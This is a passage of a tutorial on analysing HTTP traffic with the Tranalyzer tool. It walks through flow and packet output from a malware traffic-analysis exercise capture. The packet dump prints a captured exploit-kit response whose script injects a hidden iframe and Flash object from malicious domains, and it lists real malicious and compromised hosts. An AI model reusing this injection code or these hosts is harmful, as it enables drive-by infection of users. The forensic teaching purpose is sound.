A 33 0x0400000000004000 1431031945.999417000 1431032021.842696000 75.843279000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 "Private network" 49209 95.163.121.204 ru "Digital Network JSC" 80 6 0x42 0x006c 0x0000 0x0a 0x0001 0x0010 1_1 0 2_0_0_0_0_1_0_1_2_1 0_0_0_0_0_1_0 "7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/flags/de.png";"/11iQmfg" "application/x-www-form-urlencoded" "PHPSESSID=uqq1670l1pkd07vgdnsg98dee5";"PHPSESSID=uqq1670l1pkd07vgdnsg98dee5" "_11iQmfg_33_A_2_0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" "http://7oqnsnzwwnm6zb7y.gigapaysun.com/11iQmfg"
B 33 0x0400000000004001 1431031946.199749000 1431031957.906658000 11.706909000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49209 6 0x02 0x0078 0x0000 0x00 0x0044 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_2 1_0_0_0_1_0_0 "image/png";"text/html" "_img_flags_de.png_33_B_1_0" "_11iQmfg_33_B_2_0" "nginx/1.2.1" "PHP/5.4.39-0+deb7u2"
B 30 0x0400000000004001 1431031944.192640000 1431031960.017404000 15.824764000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49206 6 0x02 0x0068 0x0000 0x00 0x0044 0x0010 0_0 2 200;304 0_0_0_1_0_0_0_0_0_2 2_0_0_0_1_0_0 "text/css";"image/png" "_img_flags_it.png_30_B_5_0";"_img_flags_fr.png_30_B_6_1" "_img_style.css_30_B_1_0" "nginx/1.2.1"
B 29 0x0400000000004001 1431031941.537441000 1431031962.048801000 20.511360000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49205 6 0x02 0x0068 0x0000 0x00 0x0044 0x0010 0_0 1 200 0_0_0_1_1_0_0_0_0_2 3_0_0_0_1_0_0 "text/html";"image/png" "_img_flags_us.png_29_B_3_0";"_img_rt.png_29_B_4_1";"_img_bitcoin.png_29_B_5_2" "_11iQmfg_29_B_1_0" "nginx/1.2.1" "PHP/5.4.39-0+deb7u2"
B 34 0x0400000000004001 1431031946.186402000 1431031962.095257000 15.908855000 1 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 95.163.121.204 ru "Digital Network JSC" 80 192.168.138.158 07 "Private network" 49210 6 0x02 0x0068 0x0000 0x00 0x0004 0x0010 0_0 1 200 0_0_0_1_0_0_0_0_0_1 3_0_0_0_0_0_0 "image/png" "_img_lt.png_34_B_1_0";"_img_lb.png_34_B_2_1";"_img_button_pay.png_34_B_3_2" "nginx/1.2.1"Now you see all HTTP commands being exchanged including content names and files. Yes, really fishy. If you want to see which host requests which file:
tawk -H '{ print $httpHosts, $httpURL }' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt | sort | tcol
"62.75.195.236" "/?34eaf8bd50d85d8c6baacb45f0a7b22e"
"62.75.195.236" "/?3a08b0be8322c244f5a1cb9c1057d941"
"62.75.195.236" "/?51424ddd486ff06861fceed24e86b329"
"62.75.195.236" "/?60dbe33b908e0086292196ef001816bc"
"62.75.195.236" "/aa25f5fe2875e3d0a244e6969e589cc4"
"62.75.195.236" "/?b2566564b3ba1a38e61c83957a7dbcd5"
"62.75.195.236" "/?b514ee6f0fe486009a6d83b035a4c0bd"
"62.75.195.236" "/?d71e0bd86db9587158745a986a4b3606"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/11iQmfg";"/img/flags/us.png";"/img/rt.png";"/img/bitcoin.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/flags/de.png";"/11iQmfg"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/flags/es.png";"/favicon.ico"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/lt.png";"/img/lb.png";"/img/button_pay.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/img/style.css";"/img/flags/it.png";"/img/flags/fr.png"
"7oqnsnzwwnm6zb7y.gigapaysun.com" "/picture.php?k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764";"/img/rb.png"
"comarksecurity.com" "/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg"
"comarksecurity.com" "/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42"
"comarksecurity.com" "/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9"
"comarksecurity.com" "/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk"
"ip-addr.es" "/"
"r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in" "/"
"runlove.us" "/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9"
"runlove.us" "/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42"
"runlove.us" "/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg"
"runlove.us" "/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk"
"ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in" "/"
"va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in" "/?285a4d4e4e5a4d4d4649584c5d43064b4745"Look at the hosts and the URLs. That is malware.
The command and its output can be simplified further by using one of tawk example function, namely httpHostsURL():
tawk -e 'httpHostsURL()' ~/results/2015-05-08-traffic-analysis-exercise_flows.txt
62.75.195.236
/?34eaf8bd50d85d8c6baacb45f0a7b22e
/?3a08b0be8322c244f5a1cb9c1057d941
/?51424ddd486ff06861fceed24e86b329
/?60dbe33b908e0086292196ef001816bc
/?b2566564b3ba1a38e61c83957a7dbcd5
/?b514ee6f0fe486009a6d83b035a4c0bd
/?d71e0bd86db9587158745a986a4b3606
/aa25f5fe2875e3d0a244e6969e589cc4
7oqnsnzwwnm6zb7y.gigapaysun.com
/11iQmfg
/favicon.ico
/img/bitcoin.png
/img/button_pay.png
/img/flags/de.png
/img/flags/es.png
/img/flags/fr.png
/img/flags/it.png
/img/flags/us.png
/img/lb.png
/img/lt.png
/img/rb.png
/img/rt.png
/img/style.css
/picture.php?k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764
comarksecurity.com
/wp-content/themes/grizzly/img5.php?c=cdcnw7cfz43rmtg
/wp-content/themes/grizzly/img5.php?t=8r1gf1b2t1kuq42
/wp-content/themes/grizzly/img5.php?u=ka6nnuvccqlw9
/wp-content/themes/grizzly/img5.php?u=mfymi71rapdzk
ip-addr.es
/
r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in
/
runlove.us
/wp-content/themes/twentyfifteen/img5.php?f=ka6nnuvccqlw9
/wp-content/themes/twentyfifteen/img5.php?l=8r1gf1b2t1kuq42
/wp-content/themes/twentyfifteen/img5.php?t=cdcnw7cfz43rmtg
/wp-content/themes/twentyfifteen/img5.php?u=mfymi71rapdzk
ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in
/
va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in
/?285a4d4e4e5a4d4d4649584c5d43064b4745In the packet file you can see all the payload in the original.
tcol ~/results/2015-05-08-traffic-analysis-exercise_packets.txt
%pktNo flowInd flowStat time pktIAT pktTrip flowDuration numHdrs hdrDesc vlanID srcMac dstMac ethType srcIP srcIPCC srcIPOrg srcPort dstIP dstIPCC dstIPOrg dstPort l4Proto tcpStatesAFlags httpStat httpAFlags httpMethods httpHeadMimes httpCFlags l7Content
1 1 0x0400000000004000 1431031896.723375000 0.000000000 0.000000000 0.000000000 3 eth:ipv4:udp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 60078 192.168.138.2 07 Private network 53 17 0x00 0x0000 0x0000 0x00 0x0000 0x0010 G............va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc\fe8mfzdgrf7g0\rgroupprograms.in.....
2 1 0x0400000000004001 1431031896.874326000 0.000000000 0.150951040 0.000000000 3 eth:ipv4:udp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.2 07 Private network 53 192.168.138.158 07 Private network 60078 17 0x00 0x0000 0x0000 0x00 0x0000 0x0010 G............va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc\fe8mfzdgrf7g0\rgroupprograms.in......\f..........>K..
3 2 0x0400000000004000 1431031896.958320000 0.000000000 0.000000000 0.000000000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 49184 62.75.195.236 il Not allocated by APNIC 80 6 0x00 0x0000 0x0000 0x00 0x0000 0x0010
4 2 0x0400000000004001 1431031897.090353000 0.000000000 0.132033024 0.000000000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il Not allocated by APNIC 80 192.168.138.158 07 Private network 49184 6 0x00 0x0000 0x0000 0x00 0x0000 0x0010
5 2 0x0400000000004000 1431031897.090448000 0.132128000 0.000095000 0.132128000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 49184 62.75.195.236 il Not allocated by APNIC 80 6 0x00 0x0000 0x0000 0x00 0x0000 0x0010
6 2 0x0400000000004000 1431031897.091322000 0.000874000 0.000969000 0.133002000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 49184 62.75.195.236 il Not allocated by APNIC 80 6 0x00 0x002c 0x0000 0x02 0x0000 0x0010 GET /?285a4d4e4e5a4d4d4649584c5d43064b4745 HTTP/1.1\r\nAccept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: va872g.g90e1h.b8.642b63u.j985a2.v33e.37.pa269cc.e8mfzdgrf7g0.groupprograms.in\r\nConnection: Keep-Alive\r\n\r\n
7 2 0x0400000000004001 1431031897.091382000 0.001029000 0.000060000 0.001029000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il Not allocated by APNIC 80 192.168.138.158 07 Private network 49184 6 0x00 0x0000 0x0000 0x00 0x0000 0x0010
8 2 0x0400000000004001 1431031897.453906000 0.362524000 0.362584000 0.363553000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 62.75.195.236 il Not allocated by APNIC 80 192.168.138.158 07 Private network 49184 6 0x00 0x0028 0x0000 0x00 0x0040 0x0010 HTTP/1.1 200 OK\r\nDate: Thu, 07 May 2015 20:51:34 GMT\r\nServer: Apache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6\r\nX-Powered-By: PHP/5.3.3\r\nContent-Length: 560\r\nConnection: close\r\nContent-Type: text/html\r\n\r\n<html><body><object type="application/x-shockwave-flash" allowScriptAccess="always" width="434" height="449"><param name="movie" value="http://ubb67.3c147o.u806a4.w07d919.o5f.f1.b80w.r0faf9.e8mfzdgrf7g0.groupprograms.in/"><param name="play" value="true"></object><script>var fhxa45 = document.createElement('if'+'rame');fhxa45.setAttribute('src', 'http://r03afd2.c3008e.xc07r.b0f.a39.h7f0fa5eu.vb8fbl.e8mfzdgrf7g0.groupprograms.in/');fhxa45.setAttribute('width', 434);fhxa45.setAttribute('height', 449);document.body.appendChild(fhxa45);</script></body></html>
9 2 0x0400000000004000 1431031897.454085000 0.362763000 0.000179008 0.495765000 3 eth:ipv4:tcp 00:00:00:00:00:00 00:00:00:00:00:00 0x0800 192.168.138.158 07 Private network 49184 62.75.195.236 il Not allocated by APNIC 80 6 0x00 0x002c 0x0000 0x02 0x0000 0x0010
...Data carving with httpSniffer
Now we are interested to extract the content.
Set HTTP_SAVE_IMAGE, HTTP_SAVE_TEXT and HTTP_SAVE_APPL to 1 in httpSniffer.h, recompile httpSniffer and rerun t2.
t2conf httpSniffer -D HTTP_SAVE_IMAGE=1 -D HTTP_SAVE_TEXT=1 -D HTTP_SAVE_APPL=1 && t2build httpSniffer
t2 -r ~/data/2015-05-08-traffic-analysis-exercise.pcap -w ~/results... -------------------------------------------------------------------------------- tcpStates: Aggregated tcpStatesAFlags=0x42 httpSniffer: Aggregated httpStat=0xc53c httpSniffer: Aggregated httpAFlags=0x1113 httpSniffer: Aggregated httpCFlags=0x0010 httpSniffer: Aggregated httpHeadMimes=0x0045 httpSniffer: Number of files img_vid_aud_msg_txt_app_unk: 13_0_0_0_22_10_0 httpSniffer: Max number of file handles: 7 httpSniffer: Number of HTTP packets: 399 [52.43%] httpSniffer: Number of HTTP GET requests: 28 [7.02%] httpSniffer: Number of HTTP POST requests: 9 [2.26%] httpSniffer: HTTP GET/POST ratio: 3.11 -------------------------------------------------------------------------------- ...
The 2nd line in the httpSniffer end report indicates that 7 files are extracted.
tawk -V httpStat=0xc53c -V httpAFlags=0x1113 -V httpCFlags=0x0010 -V httpHeadMimes=0x0045The httpStat column with value 0xc53c is to be interpreted as follows: bit | httpStat | Description ============================================================================= 2 | 0x0004 | Internal state: pending URL name 3 | 0x0008 | HTTP flow 4 | 0x0010 | Internal state: Chunked transfer 5 | 0x0020 | Internal state: HTTP flow detected 8 | 0x0100 | Internal state: header shift 10 | 0x0400 | Internal state: image payload sniffing 14 | 0x4000 | Internal state: text payload sniffing 15 | 0x8000 | Internal state: application payload sniffing The httpAFlags column with value 0x1113 is to be interpreted as follows: bit | httpAFlags | Description ============================================================================= 0 | 0x0001 | POST query with parameters 1 | 0x0002 | Host is IPv4, e.g., Host: 1.2.3.4 4 | 0x0010 | Sequence number violation 8 | 0x0100 | X-Site Scripting protection 12 | 0x1000 | Possible EXE download The httpCFlags column with value 0x0010 is to be interpreted as follows: bit | httpCFlags | Description ============================================================================= 4 | 0x0010 | Potential HTTP content The httpHeadMimes column with value 0x0045 is to be interpreted as follows: bit | httpHeadMimes | Description ============================================================================= 0 | 0x0001 | Application 2 | 0x0004 | Image 6 | 0x0040 | Text
Now look into /tmp/:
ls /tmp
httpAppl httpPicture httpText ...
Look into /tmp/httpPicture:
ls /tmp/httpPicture
_favicon.ico_1_31_2_1 _img_button_pay.png_1_34_3_2 _img_flags_es.png_1_31_1_0 _img_flags_it.png_1_30_5_0 _img_lb.png_1_34_2_1 _img_rb.png_1_32_3_1 '_picture.php_k=11iqmfg&b7f2a994c3eaaf014608b272c46cf764_1_32_1_0'
_img_bitcoin.png_1_29_5_2 _img_flags_de.png_1_33_1_0 _img_flags_fr.png_1_30_6_1 _img_flags_us.png_1_29_3_0 _img_lt.png_1_34_1_0 _img_rt.png_1_29_4_1
The files are directly linked to the flow via its name coding:
Filename_Flow-Dir(0/1)_findex_#Packet-in-Flow_#Mimetype-in-FlowOpen the pics with your file browser or with an image viewer (eog, feh, …), as you wish.
Be careful with the application folder.
Conclusion
Don’t forget to reset the plugin configuration for the next tutorial.
t2conf httpSniffer --reset && t2build httpSniffer
Have fun analyzing HTTP traffic!